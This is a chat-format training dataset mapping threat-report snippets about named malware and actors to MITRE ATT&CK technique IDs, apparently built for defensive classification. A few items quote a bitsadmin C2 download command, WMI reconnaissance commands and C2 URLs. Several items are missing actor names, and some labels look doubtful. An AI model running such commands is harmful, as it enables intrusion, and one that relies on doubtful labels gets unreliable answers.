- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has distributed Machete through a fake blog website."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OsInfo function in collects a running process list."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia obfuscates the configuration with a custom Base64 and XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses VNC to connect into systems."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can launch cmd.exe to execute commands on the system."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to dump credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has detected security tools."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The image and table below illustrate TClient’s encrypted configuration that we decrypted (via Python code): Figure 10"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can be installed via DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has installed a systemd service script to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has distributed targeted emails containing Word documents with embedded malicious macros."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can perform DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy has a command to launch a file browser or explorer on the system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can inject files into running processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used tools to take screenshots from victims."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete captures audio from the computer’s microphone."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant uses a C2 mechanism similar to port knocking that allows attackers to connect to a victim without leaving the connection open for more than a few sectonds."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can identify network adjacent and accessible drives."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 used the command prompt to launch commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use PowerShell to download and execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The tool runs the following list of WMI queries: wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace wmic diskdrive get Model, SerialNumber wmic computersystem get Manufacturer, Model, Name, SystemTypec wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages wmic process get Caption,ExecutablePath The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://145.249.105[.]165/resource-store/stockroom-center-service/check.php?fm=[serial number] The C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows: spp=[system information from WMI queries] &spvg=[screenshot in JPEG format] Conclusion The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download remote files and additional payloads to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has registered itself as a scheduled task to run each time the current user logs in."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once decrypted, the backdoor takes a fingerprint of the system. It sends home various data, such as the computer and user names and the operating system version, before waiting for commands to carry out its main mission"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in collects information from the victim about Windows OS version, computer name, battery info, and physical memory."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses multiple techniques to obfuscate strings, including XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton captures the content of the desktop with the screencapture binary."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it’s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, QuarkBandit is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available Poison Ivy RAT. These RATs and the China Chopper web shell form the basis of GALLIUM’s toolkit for maintaining access to a victim network"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to remove Registry entries that it created during execution."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate and search for files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can upload files and information from a compromised host to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has communicated with its C2 servers via HTTPS protocol."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has searched for specific files prior to encryption."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used VBScript to execute commands and other operational tasks."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has the ability to encode C2 communications with base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses variations of a simple XOR encryption routine for C&C communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MirageFox has the capability to execute commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can use cmd.exe to help execute commands on the system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has downloaded tools to compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke has has used HTTP GET requests in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to upload exfiltrated files to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony has delayed execution using a built-in function to avoid detection and analysis."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif droppers have used COM properties to execute malware in hidden windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 modified the Registry to hide create user accounts."
- },
- {
- "role": "assistant",
- "content": "T1564.002 - Hide Artifacts: Hidden Users"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This script relays commands and output between the controller and the system"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SOUNDBITE communicates via DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit."
- },
- {
- "role": "assistant",
- "content": "T1564.005 - Hidden File System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads: ID Thread description 1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility 2 Decrypts command from registry using RC4 with a hardcoded key, and executes it 3 Transfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi) 4 Transfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies 5 Checks network connection, encrypts and sends gathered logs 6 Unhooks mouse and keyboard, removes bitsadmin task 7 Checks if malware’s working directory size already exceeds its threshold 8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads The malware uses the following command to receive data from its C2: bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal http:///asp.asp?ui=nrg-- Activity logging module (Splitter.exe) This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can use DLL side-loading to execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle can save its configuration data as the following RC4-encrypted Registry key: `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each web shell instance is configured to contain SP, Key, and Log variables"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to retrieve metadata for files on disk as well as a command to list the current working directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has collected system information, including the machine name and OS version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5 shows Phishery’s output to the command that injects a URL into a file named “good_test.docx”, which it will save the resulting file to “bad_test.docx”"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can collect information on user sessions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used mshta.exe to run malicious scripts on the system."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The .iqy files take advantage of Excel’s willingness to download and include the contents from a remote server in a spreadsheet"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can collect the username from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
